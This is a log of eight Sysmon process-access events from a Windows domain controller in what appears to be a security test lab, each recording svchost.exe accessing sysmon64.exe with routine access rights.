{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1491,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.799\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.799","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1492,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.802\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.802","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1493,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.802\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.802","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1494,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.802\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.802","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1495,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.802\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.802","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1496,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.802\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.802","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1497,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.802\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.802","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1498,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.802\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.802","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
